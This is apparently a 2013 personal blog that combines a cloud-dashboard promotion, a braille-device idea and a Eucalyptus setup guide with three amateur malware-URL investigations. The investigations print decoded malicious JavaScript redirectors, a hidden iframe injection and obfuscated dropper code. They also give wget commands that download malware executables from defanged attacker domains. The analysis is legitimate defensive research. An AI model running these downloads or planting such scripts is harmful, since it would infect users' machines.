Leave a comment

What is MyCloudPortal?

MyCloudPortal is about providing an enterprise level of solution to the customers out there so that they can manage multiple clouds using 1 single dashboard.
It is a cloud brokrage tool and ideal for those who are providing cloud hosting or the company who are working with multiple clouds.

What Problem this is solving?
I don’t think there is any company in IT which is not aware/working with cloud, and as we know there are multiple clouds aout there in the market like Amazon,Vcloud,Eucalyptus,OpenStack etc etc
So it is hard to manage all of these and when this projected started there were not any product out in the market which is providing solution of managing multiple cloud using 1 dashboard.

Where you can test this?
It is simple just go to and create a user ID and then log in there.
Provide the credentials and use it and test it. 🙂
It is too damn simple.

Is this free?
Yes, It is free and open. Though we got a branch for enterprise customer only but we got a free version of this too. You can download it from
In future you can expect more.
You can develop over the top of this and add new features whatever you want to.

How may cloud does this support?
Presently our product support Amazon, Eucalyptus and VCloud. But we are working over OpenStack and so this will be out soon and other than this we will be covering all the major cloud.

How is the User Experience?
As the product is open and we got a hosted version too so you can go and check it out anytime.
Other than that believe me it is for one of the best and easy UI to handle.

If you are more interested in knowing about the product then We got some videos too, which would make understanding more easy and clear any doubts 🙂

What Down my CloudPortal do

Get to know My Cloud Portal

And a Couple of new videos with the New UI to make the things more clear

If you got any more question then either ask at our website or comment below.


Digital to braille..!!

Leave a comment

Heading sounds exciting.
There is a MIT’s event going to happen next week (8th of July 2013), I was planning to participate but unfortunately I was not be able to get in and so I wanted to everyone else to know what I was thinking since last 2-3 weeks.
I am not much a electronics guy and trying to learn electronics, So please do tell me my mistakes so that I may improve it.

This concept is just a concept which I haven’t demo it yet and was planning to create a prototype in the event but unfortunately not selected so trying to tell everyone so that I may have inputs form them and if someone like it then they may implement it.

Link to the event is here

I personally believe that there are not much of the good devices are in market which would give the realtime experience to the visually challenged people.

So this concept is to convert every digital media to the braille.
Best part of this is it is not just for english or something it would be able to all symbols and languages to braille.
Person readin the reader will have experience of reading the real book and not just books we may convert webpages and other digital media to braille.

There are not much pictures available but will try to provide you that within few days as I got no camera and no electronics which I may provide.

Constraints for present Prototype:
I am converting all the data to 1 particular font for present and I am keeping the size to tbe constant for every media.

Screen used: Something similar to magnetic slate thing which works on the principe of magnetic field.
Link to Magnetic slate

I have no idea how to do this so this is my next task to make this screen work something similar to that of kindle reader.
and increase the magnetic field by providing the power.(not sure how research in progress)
As my research says the E-ink technology works we may develop something similar with it as that of kindle screen which is a Ebook reader.

Let’s place this screen directly above a bread board, which got office pins in it.
Now as the image produce over the screen it will produce a magnetic filed which will pull the office pins towards it.
As we all know that magnetic force would be vectorial in nature, for those who don’t read it from here
Now those pins which are directly below the screen will pull those pins towards it and the pins which are not directly below will face the force component in some specific degree so it won’t be pulled up that much as that of the pins directly below the symbols (remember that symbols are magnetic)
Now time is mesure the distance with which the pins are up than.
This is all what I am sure about after that I an not sure about things


We may use the pins to trigger the circuit for the specific pattern and produce the content over the electronic braille screen or refreshable braille screen.


We may trigger the circuit by measuring the moved screens from below the bread board and then to trigger the screen.

1) It is fast
2) Will convert the all those alphabets to braille which are shown in the screen.
3) will have the real feel of reading the book or watching the webpage in realtime.
For now the only constraint of font and size and I am not sure this really matters or not.

Different ideas which are kind of similar and this idea is inspired form them
1) A braille reader can read up to 200 words per minute
2) Zixel: A 2.5-D Graphical Tactile Display System
3) World’s 1st Braille Smartphone for Blind People

Comments and views required.
Would love if someone feel like to implement this at there end and would love to extend this 🙂

My work for autistic people is over my another blog, This was my 1st blog for Visually challenged people, Will post more updates over this work very soon.
Link to my another block

How to handle the redirection from malicious websites..!!

1 Comment

The journey starts with a link of website.

Where this link tell us about a malicious URL: h00p://polycontract[dot]ru/Wallmart.html?go=help

The URL is normal one if you ignore the .ru thing 🙂

When I tried to execute this one over my Browser they redirected me to

Then I have to use wget to get the download this file.

After downloading this file I tried to open this in Browser and again the same redirection. Grrr..

Let’s see the reply header

HTTP/1.1 200 OK
 Server: nginx/0.8.54
 Date: Thu, 16 May 2013 14:26:15 GMT
 Content-Type: text/html
 Connection: keep-alive
 Last-Modified: Thu, 16 May 2013 14:03:59 GMT
 ETag: "6bc8011-2e9-4dcd6567d31c0"
 Accept-Ranges: bytes
 Content-Length: 745

Ok so we all know the website is not down and it’s redirecting, as we have the code so let’s take look over the code which is redirecting us.

<titl>Wallmart is loading...</title>
<script type="text/javascript"><!--
<meta http-equiv="refresh" content="0; url=h00p://virgin-altantic[dot]net/news/ask-index.php"></noscript>

Suspicious ok let’s see what virustotal say about this this website.


The above 2 are the URL with which I started with and another one is of


So, they got redirection over every webpage so I have to download every thing using wget and then to analyze it, no GUI only code 😦

2 different analysis anyways good thing is it’s still showing us that it is malicious 🙂

After downloading the 2nd file I analysed it and find out there are 2 java scripts in that one.

So, I downloaded those 2 files respectively and the link were

<script src="/media/system/js/core.js" type="text/javascript"></script>
<script src="/media/system/js/caption.js" type="text/javascript"></script>

Time to analyze these 2 files. The virus total reports are

For core.js

For caption.js

Indeed they are malicious.

Time to take a look inside these 2


The malicious code is common for both of the files.

After decrypting it what I got is

document.write(unescape("<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}',62,122,'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|h00p://online2you[dot]org/search.php?sid=1 '.split('|'),0,{}));</script> "));

Which is finally redirecting you to


Next task was to get the payload as most probably this was the site where they have hidden the treasure.

But unfortunately this was down error 404

 Connecting to||:80... connected.
 HTTP request sent, awaiting response... 404 Not Found
 2013-05-18 17:44:43 ERROR 404: Not Found.

I thought as there is redirection everywhere then this might be because of different location, So I tried it with proxy os US,Russia and some 3-4 more sut same result for every thing.

is it me or everyone else is unable to download the contents from this site?

ok let’s see the who is for the website

whois for  h00p://polycontract[dot]ru/

domain:        POLYCONTRACT.RU
org:           PoliKontrakt, LLC
registrar:     REGRU-REG-RIPN
created:       2011.01.18
paid-till:     2014.01.18
free-date:     2014.02.18
source:        TCI

urlquery report for online2you:

whois for h00p://online2you[dot]org/

Domain ID:D168159997-LROR
Created On:14-Mar-2013 22:36:14 UTC
Last Updated On:14-May-2013 03:45:15 UTC
Expiration Date:14-Mar-2014 22:36:14 UTC
Sponsoring, Inc. (R1248-LROR)
Status:OK Registrant ID:orgph63300498572
Registrant Name:Whois Agent
Registrant Organization:Whois Privacy Protection Service
status: ACTIVE
 remarks: Registration information:

And in last snap shot of all the the files which I have gathered

Screen Shot 2013-05-18 at 5.55.55 PM

This was my Journey and this was the end.

Your Inputs / Criticism are required


Eucalyptus Deployment

Leave a comment


Most Important thing Activate the Virtualization from the Bios else nothing going to work (This is what I forgot to do)

The The version of Eucalyptus which I got is 3.2 and you can download it from

This got Eucalyptus over CentOS which we may install for 1 node or multiple node.

For installation over 1 node it’s comparatively easy and fast, So I am just discussing Installation over 2 node .


Hardware I got:


2 server both identical

quard core intel xeon processor

4GB ram

1TB hardisk

2 Networking Cards


1st machine specification

Name of node: MyCloudPortalNode

IP: eth0: (This is for public use)

eth1: (This is for private use)

1)Start the System and press F2 key and get into bios.

2)In advance menu “Enable” virualization which was previously disabled. Press F10 to save

3)Press F6 on restart and choose the boot form CD option

4)Insert the Eucalyptus DVD and when it prompts for the options choose for installation of node server

5) when it prompts for the networking IP insert the values which already have provided on the top.

6)It’s going ot create the br0 (Bridge) by itself.

7) Set the ntp server

Yum install ntp

chkconfig ntpd ok

service ntpd start

then check the date by



Leave this machine just like then and then go for the installation of front controller


2nd machine

Name of Node: MyCloudPortalFront

IP: Eth0:



1)Start the System and press F2 key and get into bios.

2)In advance menu “Enable” virtualization which was previously disabled. Press F10 to save

3)Press F6 on restart and choose the boot from CD option

4)Insert the Eucalyptus DVD and when it prompts for the options choose for installation choose install front end.

5) Choose the IP which I have already be defined and then start it

6) when it got start it would ask about the public and private IP


don’t change private IP and in public IP provide the IP range which you want to be selected by the VM when this would get ocneected.

7)make all this accordingly and then start the machine.

This would ask about the IP of node on restarting the system after installation being done, enter the IP of nodes then this would prompt for SU password enter it and it is registered 🙂

8)Set the ntp server

Yum install ntp

chkconfig ntpd ok

service ntpd start


then check the date

Now both machine common.

Power off all the eucalyptus services

Over Front end

Service eucalyptus-cloud stop

service eucalyptus-cc stop

Over NC

service eucalyptus-nc stop


Test euca-describe-availability-zones verbose


Output should be like this, I already got 2 Small VM so it’s saying that free is 2/4

euca-describe-availability-zones verbose

AVAILABILITYZONE CLUSTER01 arn:euca:eucalyptus:CLUSTER01:cluster:cc_01/

AVAILABILITYZONE |- vm types free / max   cpu   ram  disk

AVAILABILITYZONE |- m1.small 0002 / 0004   1 512 5

AVAILABILITYZONE |- c1.medium 0001 / 0002   2 512 10

AVAILABILITYZONE |- m1.large 0001 / 0002   2   1024 15

AVAILABILITYZONE |- m1.xlarge 0001 / 0002   2   2048 20

AVAILABILITYZONE |- c1.xlarge 0000 / 0001   4   4096 20

For checking the number of VM you may create and other available resources.


Now start all three services and navigate your browser to


https://<frontendip>:8888 : For creation of VM


https://<frontendip>:8443  : For profile editing


Now go and play with VM 🙂

After creation of VM this is how this will look like when a VM is created and running.

The green tick mark will be different for different kind of things.


Do comment about your views any error or some questions.

I love Comments 😉

Handling error 402: Payment Required with malicious domain #MMD


Link from where I started:

And this link directed me to here:


Error 402 and payment Required .

Request URL:h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar
Request Method:GET
Status Code:402 Payment Required
Response Header
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type:text/html; charset=utf-8
Date:Mon, 08 Apr 2013 13:16:25 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By:ASP.NET version 4


Suspicious isn’t it..

So I proceeded by getting in the sub directories of the server and it resulted in the link


Which automatically lead to a blank webpage.

Response for h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/pdfx.html

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date:Mon, 08 Apr 2013 15:49:50 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By:ASP.NET version 4

Response for “h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/zmiohek.html”

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date:Mon, 08 Apr 2013 15:49:51 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By:ASP.NET version 4


When I tried to analysed its source then find out a variable storing the web address.

var icEVKt;
var Owsfe;CvkiFV='RHaLS';if (CvkiFV=='Yiwvd') vPUR='CnYEdy';
var XXwVKa="h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32";

now use

wget –save-headers -d h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32

-d for debugging and –save-headers for saving the headers.


Simply paste this in your browser to download the exe 😉

Now this is the Analysis Report of this file using Virus total and it says 8/45

Anubis Report for this exe

Dig Report

; <<>> DiG 9.8.3-P1 <<>> XFECAJSMIPICHBEX.IN ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5853
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
XFECAJSMIPICHBEX.IN. 7200 IN SOA 2013040403 7200 7200 172800 38400
;; Query time: 401 msec
;; WHEN: Tue Apr 9 11:42:38 2013
;; MSG SIZE rcvd: 239


Domain ID:D7196301-AFIN
Created On:04-Apr-2013 21:46:01 UTC
Last Updated On:04-Apr-2013 21:46:03 UTC
Expiration Date:04-Apr-2014 21:46:01 UTC
Sponsoring Registrar:Webiq Domains Solutions Pvt. Ltd. (R131-AFIN)
Registrant ID:WIQ_27213783
Registrant Name:founder api
Registrant Organization:N/A
Registrant Street1:foundap 4
Registrant City:new york
Registrant State/Province:New York
Registrant Postal Code:10006
Registrant Country:US
Registrant Phone:+1.5274563219

Domains hosted over Same IP Virus total report:


If you check the WhoIs for every domain you will find the same credentials like phone number,


Screen shot for h00p://


Screen shot for Geographical address locator.

According to the

Code there are 2 PDF but able to download just 1 of those 2.


Pdf downloaded


Header for page “h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/TLfeaOwS.pdf”


PDF Data over browser:


%PDF-1.6 %�•� 18 0 obj <> endobj 6 0 obj <> endobj 22 0 obj <> endobj 8 0 obj <> stream 1.6511*pdf Piexnlaypa

endstream endobj 20 0 obj <> endobj 23 0 obj <> endobj 5 0 obj <> endobj 1 0 obj <> endobj 21 0 obj <> endobj 7 0 obj <> /XObject <<>>>> endobj 19 0 obj <> endobj xref 0 24 trailer <> startxref 802 %%EOF
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0</pre>
Date:Tue, 09 Apr 2013 13:17:17 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By:ASP.NET version 4

Virus total report for the pdf file

Which confirm this as malicious.

Screen Shot 2013-04-25 at 4.47.15 PM

Snap Shot of all the files.

Every time you download the file it’s goign to give some random name to it.



Malicious analysis #MMD


we got the information of Bad guy from this link (

Which FInally leads us to this (h00p://www.robaina91[dot]com/es/robaina-album.html) website.

This looks like some normal one but it is not (Though google Crome already told me about the site is malecious).

Let’s try to see the reply header






Date:Wed, 10 Apr 2013 10:45:33 GMT


Last-Modified:Fri, 01 Feb 2013 20:09:26 GMT

Server:Apache/2.2.3 (CentOS)


Looks like normal one indeed it is lets dig a little more 🙂


On little analysis of this code I find out

<iframe src="h00p://allbestauto042[dot]ru/in.cgi?ftp" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;">


ok, Lets analyse this link  h00p://allbestauto042[dot]ru/in.cgi?ftp

The Header says

Request URL:h00p://allbestauto042[dot]ru/in.cgi?ftp

Request Method:GET

Status Code:302 Found


Query String Parametersview sourceview URL encoded

  1. ftp:

Response Headersview source


Content-Type:text/html; charset=UTF-8

Date:Thu, 11 Apr 2013 06:08:31 GMT


Server:Apache/2.2.15 (CentOS)

Set-Cookie:vbpnxftp=_1_10000_; expires=Fri, 12-Apr-2013 06:08:31 GMT; path=/;

Set-Cookie:TSUSER=ftp; expires=Fri, 11-Apr-2014 06:08:31 GMT;path=/;



Why 302 and why is is redirecting and why not showing google IDK Please do tell me as I have no idea but this look suspecious.

After this it is loading 10 php file



Range from flow01-10


Lets dig a little more.

Request URL:h00p://promoution115[dot]ru/tds/in.cgi?default

Request Method:GET

Status Code:302 Found


Response header


Content-Type:text/html; charset=UTF-8

Date:Thu, 11 Apr 2013 06:14:46 GMT


Server:Apache/2.2.15 (CentOS)

Set-Cookie:vbpnxdefault=_10_0_20_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/;

Set-Cookie:vbpnx2=_0_98_102_48_35_58_88_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/;



Again redirecting.


After digging a little more I came across






This ask me to use JAVA as I don’t know the website so I never give permission but this means I am on track and close to my target.

So let’s dig a little more.


Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0




Date:Thu, 11 Apr 2013 04:17:33 GMT

Expires:Thu, 19 Nov 1981 08:52:00 GMT




X-Powered-By:ASP.NET version 4



Let’s take a look in it’s code


<p dir="ltr">ZNtS='UVne';if (ZNtS=='NYhMNY') RQvjqh();function RfTuWD(){}function omjcz(){}var PMispi=219;TbtOk='iCUcc';if (TbtOk=='xsPS') eHaPAj='PWcK';</p>
<p dir="ltr">var TgPZN='YxGr';function zuWU(){var PjSQr='LEBk';kGuff='kVcVPJ';if (kGuff=='DgDnT') jCdMP();}FOgl='mNgzp';if (FOgl=='FdLFVa') wJkyeL='nyLce';</p>
<p dir="ltr">var kdXJWSBiW="h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA";</p>
<p dir="ltr"></script>


Isn’t this suspecious..??



Let’s see another file now and this end up with



Request Method:GET

Status Code:200 OK

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0




Date:Thu, 11 Apr 2013 12:04:24 GMT

Expires:Thu, 19 Nov 1981 08:52:00 GMT




X-Powered-By:ASP.NET version 4


<input type="text" id="bxpkr" value="78agb3aoadb2ajapao829ha1alahan9qad9haj8aada9aoabanaf8eb4abamb3af8eafb6aeabb7b18bb978b4abb082afb6aeabb2af93aoafb5829aabb2af8a8b9178afb6aeabb2af8gb1afb29aabb2af8aafb6aeabb2af8gahafb29aabb2af8a8b828d82afb6aeabb7b18b9178b4abb082ada9b4abamb3af93afb1adabaqaf8ab4abamb3af8b828d828a8aafb6aeabb7b19393aob3amam8b8295828484829082849182afb6aqajb0afb193848dafb6aeabb2af8gb2ap9r9q999pb2b0ajaoah8a8b8b9178aeapadb3anafaob28gadapapalajaf93ada9aoabanaf828d82849384828d82ada9b4abamb3af9178bb78b4abb082ai9laqb7ak9aabam829382aoabb4ajahabb2apb08gb3b1afb097ahafaob28gb2ap9iapb5afb099abb1af8a8b9178ajag8aai9laqb7ak9aabam8gajaoaeafb69lag8a84b5apb58o8m848b928i82888882ai9laqb7ak9aabam8gajaoaeafb69lag8a84anb1ajaf848b94938i8bb9789ha1alahan9qad9haj8a84ag9d9dai9qabb1aeabb1848e82alaea29ga19p98aja18d8488ai938l8k848e828j8b9178aeapadb3anafaob28gb5b0ajb2af8a8492ajagb0abanaf82agb0abanafacapb0aeafb093898i8982b1adb0apamamajaoah9389aoap8982b1b2b7amaf9389aqapb1ajb2ajapao90abacb1apamb3b2af91b2apaq908iaqb691amafagb2908iaqb6918982b1b0ad9389agaob2b18gaib2anam8994928hajagb0abanaf94848b9178bb78b4abb0829paqamajb29kb3an93agb3aoadb2ajapao8ab1b2b08bb978b4abb082b0afb293a5a79178b4abb082b1aqam93b1b2b08gb1aqamajb28a8ha5a68ga6a98e8fa78hah8b9178agapb08aaj938i91aj928m91aj8d8d8bb978ajag8ab2b7aqafapag82b1aqama5aja7839384b3aoaeafagajaoafae848bb9b0afb2a5aja793b1aqama5aja791bbafamb1afb9b0afb2a5aja793848i8491bb78bb78b0afb2b3b0ao82b0afb28gakapajao8a84848b9178bb9178b4abb0829dafb29kb3an93agb3aoadb2ajapao8ab1b2b08bb978b2b0b7b978b0afb2b3b0ao829paqamajb29kb3an8ab1b2b08ganabb2adai8a8ha5a6aea7a5a6aea68ga6a98e8fa78c8h8b8gakapajao8a84848b8b78bbadabb2adai8aad8bb9bb9178b0afb2b3b0ao8284849178bb9178b4abb0829dafb29maeaga0afb0b1ajapao93agb3aoadb2ajapao8a8bb978ajag8aaoabb4ajahabb2apb08gaqamb3ahajaob182888882aoabb4ajahabb2apb08gaqamb3ahajaob18gamafaoahb2ai948i8bb978b4abb082aqamb3ahajao9kabanaf829382aoabb4ajahabb2apb08gaqamb3ahajaob1a58497aeapacaf8297adb0apacabb284a79178ajag8a83aqamb3ahajao9kabanaf8b82b0afb2b3b0ao8284849178b4abb082aqaeaga9b4afb0a9b4afb0b1ajapao939dafb29kb3an8aaqamb3ahajao9kabanaf8gb4afb0b1ajapao8b9178b4abb082aqaeaga9b4afb0a9aeafb1adb0ajaqb2ajapao939dafb29kb3an8aaqamb3ahajao9kabanaf8gaeafb1adb0ajaqb2ajapao8b9178b4abb082aqaeaga9b4afb0a9anajanaf9384849178ajag8aaoabb4ajahabb2apb08ganajanaf9qb7aqafb1a584abaqaqamajadabb2ajapao8hb4aoae8gabaeapacaf8gaqaeagb6anam84a78bb9aqaeaga9b4afb0a9anajanaf93848r8g8i8g8i8g8i8491bbafamb1afb9ajag8aaoabb4ajahabb2apb08ganajanaf9qb7aqafb1a584abaqaqamajadabb2ajapao8hb4aoae8gabaeapacaf8gb68fanabb0b184a78bb9aqaeaga9b4afb0a9anajanaf93848q8g8i8g8i8g8i8491bbbb9178ajag8aaqaeaga9b4afb0a9b4afb0b1ajapao839384848bb978b0afb2b3b0ao82aqaeaga9b4afb0a9b4afb0b1ajapao9178bb78afamb1af82ajag8aaqaeaga9b4afb0a9aeafb1adb0ajaqb2ajapao839384848bb978b0afb2b3b0ao82aqaeaga9b4afb0a9aeafb1adb0ajaqb2ajapao829178bb78afamb1af82b978b0afb2b3b0ao829dafb29kb3an8aaqaeaga9b4afb0a9anajanaf8b9178bb78bbafamb1afb978b4abb082aeajb4a9apacak829382aeapadb3anafaob28gadb0afabb2af9bamafanafaob28a84aeajb4848b9178aeapadb3anafaob28gacapaeb78gabaqaqafaoae99aiajamae8aaeajb4a9apacak8b9178aeajb4a9apacak8gajaoaoafb09e9q9j9i82938289929l989g9b999q82ajae829382849maeag9mamb3ah9lacak8482aoabanaf93849maeag9mamb3ah9lacak8482999i979p9p9f9a9384adamb1ajae9099978q978r8p8q8i8f8k8q8i9a8f8j8j999c8f978k8m9a8f8m8m8m8n8n8l8n8m8i8i8i8i8482a19f9a9q9e93848i84829e9b9f9d9e9q93848i8494928h9l989g9b999q94899178b2b0b7b978b0afb2b3b0ao829dafb29kb3an8a9maeag9mamb3ah9lacak8g9dafb2a0afb0b1ajapaob18a8b8b9178bbadabb2adai8aad8bb9b0afb2b3b0ao82848491bb9178bb78bb78aqaeagb4afb08293829dafb29maeaga0afb0b1ajapao8a8b9178ajag8aaqaeagb4afb0839384848b78aqaeagb4afb093aqabb0b1af9faob28aaqaeagb4afb08b9178afamb1af82aqaeagb4afb0938i9178agb3aoadb2ajapao829canb1b7al8a8b82b978b4abb082b3ab829382aoabb4ajahabb2apb08gb3b1afb097ahafaob28gb2ap9iapb5afb099abb1af8a8b9178ajag828ab3ab8gajaoaeafb69lag8a84b5ajao848b94938i8b82b0afb2b3b0ao828j9178b0afb2b3b0ao828i9178bb78agb3aoadb2ajapao829n9k9oabb7agb88a8bb978ajag8aaoabb4ajahabb2apb08gb3b1afb097ahafaob28gajaoaeafb69lag8a8499aib0apanaf848b94938i8b82b0afb2b3b0ao828j9178b0afb2b3b0ao828i9178bb78agb3aoadb2ajapao82b29ib59aak9b9a9lac8aarapa499ak8b82b978b4abb082aqajagb0829382aeapadb3anafaob28gadb0afabb2af9bamafanafaob28a84ajag848d84b0ab848d84anaf848b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89b5ajaeb2ai898e828j8i8b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89aiafajahaib2898e828j8l8b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89b1b2b7amaf898e8284b2apaq908j8i8iaqb691aqapb1ajb2ajapao90abacb1apamb3b2af848b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89b1b0ad898e82arapa499ak8b9178aeapadb3anafaob28gacapaeb78gabaqaqafaoae99aiajamae8aaqajagb08b9178bb78ajag828a9canb1b7al8a8b82888882839n9k9oabb7agb88a8b8b82b978ajag828a8aaqaeagb4afb094938q8i8i8i82888882aqaeagb4afb092938q8k8i8i8b82baba828aaqaeagb4afb094938r8i8i8i82888882aqaeagb4afb092938r8l8i8i8b8b78b29ib59aak9b9a9lac8a84979banapal9p9c8gaqaeag848b9178ajag828aaqaeagb4afb0829493828o8i8i8i82888882aqaeagb4afb08292828q8i8i8i8b78b29ib59aak9b9a9lac8a84b5ar9999akan8gaqaeag848b9178ajag828a838a8aaqaeagb4afb094938q8i8i8i82888882aqaeagb4afb092938q8k8i8i8b82baba828aaqaeagb4afb094938r8i8i8i82888882aqaeagb4afb092938r8l8i8i8b8b82888882838aaqaeagb4afb0829493828o8i8i8i82888882aqaeagb4afb08292828q8i8i8i8b8b78b1afb29qajanafapb3b28a84aeapadb3anafaob28gb5b0ajb2af8a8992ajagb0abanaf82b1b2b7amaf93a684b2apaq908j8i8iaqb691aqapb1ajb2ajapao90abacb1apamb3b2afa68482b1b0ad93a684akapb4ag8gaib2anama68494928hajagb0abanaf94898b848e8l8i8i8i8b9178bb78">


So a text area with some random text…


Nothing much. Let’s get back and analyse that file which we got from the javascipt 🙂



ZNtS='UVne';if (ZNtS=='NYhMNY') RQvjqh();function RfTuWD(){}function omjcz(){}var PMispi=219;TbtOk='iCUcc';if (TbtOk=='xsPS') eHaPAj='PWcK';</p>
<p dir="ltr">var TgPZN='YxGr';function zuWU(){var PjSQr='LEBk';kGuff='kVcVPJ';if (kGuff=='DgDnT') jCdMP();}FOgl='mNgzp';if (FOgl=='FdLFVa') wJkyeL='nyLce';</p>
<p dir="ltr">var kdXJWSBiW="h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA";



the new script and there we got what we really wanted 🙂




The real malware what we always wanted to have 🙂


wget –save-header h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA


Download this file and let’s see its reports


Virus total report


Anubis report


So malware confirmed.


In the process of analysis I came across “h00p://golf2day[dot]com/wnqe.html” but I am not be able to confirm why it is malecious or being declared malicious by browser as it was be asking for some ID pass and creating a secure connection.


Anyhow let’s see the domain and whois of this domain


  Domain Name: 3D-GAME.COM

  Registrar: DNC HOLDINGS, INC.

  Whois Server:

  Referral URL:

  Name Server: NS1.DTDNS.COM

  Name Server: NS2.DTDNS.COM

  Name Server: NS3.DTDNS.COM

  Status: clientDeleteProhibited

  Status: clientTransferProhibited

  Status: clientUpdateProhibited

  Updated Date: 03-oct-2012

  Creation Date: 13-apr-2003

  Expiration Date: 13-apr-2014

Registrant:North Loop Networks

1807 3rd st ne

Minneapolis, MN 55418


612 385 5501

Domain Name: 3D-GAME.COM


Administrative Contact:

Manager, Hostmaster

1807 3rd st ne

Minneapolis, MN 55418


612 385 5501

Technical Contact:Manager, Hostmaster

1807 3rd st ne

Minneapolis, MN 55418


612 385 5501

Record last updated 03-02-2011 12:39:17 PM

